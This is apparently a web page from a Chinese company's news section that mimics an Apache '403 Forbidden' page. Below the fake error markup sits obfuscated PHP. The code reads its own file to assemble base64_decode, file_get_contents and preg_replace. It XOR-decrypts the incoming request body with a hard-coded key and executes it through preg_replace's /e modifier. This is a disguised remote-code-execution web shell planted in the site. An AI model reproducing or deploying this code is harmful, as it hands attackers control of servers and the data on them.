新闻动态

1

2025-08-05 00:03:27 李经理 2

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html><head>

    <title>403 Forbidden</title>

</head>

<body>

<h1>Forbidden</h1>

<p>You don't have permission to access this resource.</p>

<hr>

<address>Apache/2.4.46 (Ubuntu) Server at  Port 80</address>

</body></html>

<?php

/**preg_replace file_get_contents base64_decode*/

@error_reporting(0);

function Decrypt($data)

{

    $key="e45e329feb5d925b";

    $e=new SplFileObject(__FILE__);

    $e->seek(11);

    $bs=substr($e,34,13);

    $after=$bs($data."");

    for($i=0;$i<strlen($after);$i++) {

        $keyIndex = ($i + 1) & 15;

        $after[$i] =($after[$i] & ~$key[$keyIndex]) | ($key[$keyIndex] & ~$after[$i]);

    }


    return $after;

}


$f="RF0VCR0WDwsSQBA=";

$a = new SplFileObject(__FILE__);

$c=new SplFileObject(__FILE__);

$a->seek(11);

$c->seek(11);

$b = substr($a, 3, 12);

$c=substr($c,16,17);

echo Decrypt($f);

@$post=Decrypt(@$c(Decrypt($f)));

@$b('/ad/e','@'.Decrypt('UUMEXw==').'($post)', 'add');